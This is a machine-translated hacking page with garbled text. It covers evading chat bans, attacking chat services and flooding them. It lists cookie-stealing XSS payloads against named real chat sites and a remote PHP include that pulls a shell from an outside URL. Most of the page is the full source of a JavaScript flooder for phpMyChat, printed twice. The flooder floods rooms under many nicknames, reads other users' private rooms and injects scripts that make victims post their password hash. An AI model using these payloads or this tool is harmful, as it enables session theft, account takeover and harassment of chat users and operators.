This page has been robot translated, sorry for typos if any. Original content here.

Chats, Schwachstellen. Codes. Flut

Umgehen Bana

In vielen Chatrooms kann der Administrator Sie auf verschiedene Weise verbieten:
- durch Spitznamen - durch Seife - durch IP-Adresse - durch Comp_ID Die ersten beiden Punkte kosten den Spitznamen und Seife.


Bypass-Verbot nach IP-Adresse.

1) Melden Sie sich vom Chat ab. 2) Löschen Sie Cookies für diesen Chat. Schließen Sie das Browserfenster. 3) Ändern Sie die IP mit einem Proxy. 1. Ich denke, jeder wird mit dem ersten Punkt fertig werden ... 2. Klicken Sie im Browser (Internet Explorer) auf Extras -> Internetoptionen -> "Cookies" löschen. 3. Verwenden Sie als Proxy A4Proxy, Hide.IP.Platinum.v2.1 (suchen Sie nach neueren Versionen). Außerdem gibt es ein Programm, das die Browser-ID im "Super Bath" (nur in den FastBB-Foren) "AntiBan" ändert.


Umgehungsverbot für Comp_ID.

Nehmen Sie beispielsweise Comp_ID: yjQVj1KUZbd45, es besteht aus 13 Zeichen (dies ist immer). 1,2,3,4 Zeichen - dies wird durch das Java-Skript am Eingang der Seite der Site, des Chat, des Forums und dieser Zeichen übertragen. Dieses Programm hat 9,10 Zeichen - das ist der Benutzeragent! Sie ändern sich durch Wechseln zu einem anderen Browser oder Ändern in der Registrierung: Gehen Sie zur Registrierung (Start -> Ausführen -> Regedit). Suchen Sie dort nach diesem Abschnitt: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Interneteinstellungen \ Benutzeragent \ Post Platform Create Abschnittszeichenfolgeparameter mit dem Namen "Ultra-Pooper Post Platform" und Wert, beispielsweise "IEAK". und zum Browser gehen! Sie können diese Zeichen auch mit Hilfe dieses Programms ändern. RMOSChange 11 und 5,6,7,8 Zeichen - Zeitzone. Ändern Sie die Zeitzone und alles ist in Ordnung. 12. ist die Farbtiefe. Ändern Sie die Farbtiefe in den Bildschirmeinstellungen. Die 13. ist die Bildschirmauflösung. Ändern Sie die Bildschirmauflösung.


Sicherheitslücken einiger Chats

  ------------------------- Vodoo CHAT ----------------------- ----
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Urheber: qBiN
 Ausnutzen:
 http://site.com/chat/go.php?url=java script: alert (/ Tested% 20von% 20qBiN /);
 Lösung: Filtern Sie die URL-Variable, Sie können sie sogar mithilfe von Sockets auf Gültigkeit prüfen.
 ------------------------------
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Urheber: qBiN
 Ausnutzen:
 http: //sitename/chat/password_reminder.php? look_for =% 3Cscript% 3Ealert (/ qBiN test /);% 3C / script% 3E
 ------------------------------
 Typ: [PHP einschließen]
 Produkt: Voodoo Chat 1.0RC1b und möglicherweise frühere Versionen.
 Quelle: xakep.ru
 Beispiel:
 http://sitename.com/[ScriptPath.fm/index.php?file_path=http://SHELLURL.COM?
 ------------------------------
 Typ: FLOODER
 Produkt: Voodoo-Chat
 Urheber: NaX [no] r †
 ausnutzen: 
 http://www.balartrating.ru/flood.zip
 ------------------------- CHAT Borodina ----------------------- ----
 Vielleicht ist das Material ein bisschen alt, aber auch so http://antichat.ru/txt/chat_borodin/ Das Video ist hier http://video.antichat.net/videos/chat_borodin.rar Sicherheitslücke gefunden: Morph
 Autor des Artikels: Morph
 ------------------------- NAROD Chat ----------------------- ----
 Typ: [XSS]
 Produkt: NAROD Chat
 Urheber: [sL1p]
 Exploit: Passives XSS:
 http://www.yandex.ru/cgi-bin/customize.pl?yxqs= "> <script> alert (document.cookie) </ script>
 ------------------------- Sicherheitslücken in bestimmten Chats ---------------------- -----
 Typ: [XSS]
 Produkt: www.bazar.co.ua
 Urheber: max_pain89
 Exploit: Passives XSS:
 http://www.bazar.co.ua/?error [] = <script> bestätigen (/ xxx /) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.sibchat.ru
 Urheber: [sL1p], Kaban
 Exploit: Passives XSS:
 http://www.sibchat.ru/gallery.php?sid= '> <script> alert (document.cookie) </ script> http://www.sibchat.ru/card_help.php?sid= "> < script> alert (document.cookie) </ script> http://www.sibchat.ru/register.php?sid= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chatinez.zp.ua
 Urheber: [sL1p]
 Exploit: Passives XSS:
 http://chatinet.zp.ua/winter2005/party/?001=6941337 <a>% 22% 27 "> <script> alert (document.cookie) </ script>
 Wenn gewünscht, kann 001 ersetzt werden durch:
 002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016
 ------------------------------
 Typ: [XSS]
 Produkt: www.smchat.ru
 Urheber: [sL1p]
 Exploit: Passives XSS:
 http://www.smchat.ru/?key= "> <script> alert (document.cookie) </ script>
 http://www.smchat.ru/?chatname=&key= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?ontopic=default&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?activate=&login= "> <script> alert (document.cookie) </ script>
 http://www.smchat.ru/?password1=&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?det=default&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?count=1000&key= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?email=&key= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chat.ru
 Urheber: [sL1p]
 Exploit: Passives XSS:
 http://www.chat.ru/user/register.html?dop10=default&confemail= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?anotherpw= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?city=&name= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?action=default&username= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?city=&year= "> <script> alert (document.cookie) </ script>
 Durch die Kombination von Abfragen können Sie viel mehr xss als in dieser Liste implementieren. 
------------------------------ Typ: [XSS] Produkt: www.krovatka.ru Urheber: [sL1p], blackybr Exploit: Passives XSS: http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8 "> <script> alert (document.cookie) </ script> http://klubnichka.krovatka.ru/f/e.cgi?c=6&n= "> <script> alert (document.cookie)% 3B </ script> http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn= "> <script> alert (document.cookie)% 3B </ script> http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B </ p> / script> & ch = 6 & flag = 0 http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script % 3E Zum Beispiel wird der Kanal klubnichka genommen, durch Ändern des Kanalnamens ist es natürlich möglich, xss überall zu implementieren. ------------------------------ Typ: [XSS] Produkt: www.chatcity.ru Urheber: [sL1p] Code: http://www.ChatID.chatcity.ru/people/pp33.cgi?c=Chat ID & nn = "> <script> alert (document.cookie) </ script> Die Chat-ID wird durch die Chatadresse ersetzt. Sie haben alle einen numerischen Wert. ------------------------------


Javascript Flood für phpmychat

Wie zu verwenden:

Chatadresse unter <BASE href = "/click?http://neuch.ru/chat/">

(Sie müssen den Pfad zum Chat-Ordner angeben, manchmal chat \ chat \)

Stoppen Sie die Überflutungstaste, um jede Art von Überschwemmung zu stoppen

Logge dich aus verschiedenen Fluten ein:

"user0 betritt den Raum"
"user1 betritt den Raum"
"user2 betritt den Raum"

Loggen Sie sich ein und fluten Sie von verschiedenen Spitznamen aus:
Das Gleiche, nur jeder, der sich einloggt, hinterlässt ein Mesagu

Login:
Geben Sie einfach den Chat ein, damit Sie von einem Benutzer überfluten können
Was ist unter der Überschrift Nachrichten senden - für das Fluten von einem Benutzer

Von allen Benutzern im IE:
Kann im Namen aller anderen schreiben, die sich im IE befinden
Weitere nützliche Funktionen
Pass ändern
Hesh Sniffer und Login, um das Profil zu betreten, ändern Sie so schnell seinen Pass
(nicht mehr relevant, da der Hash überhaupt nicht benötigt wird, um den Benutzer zu ficken)

Außerirdische privat:
Lesen Sie das Thema
Senden von Skripten für Mazila
Für den Mozilla-Browser rollen einfach \ x3c \ x3e nicht dorthin, da gibt es eine Besonderheit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML Speichern Sie 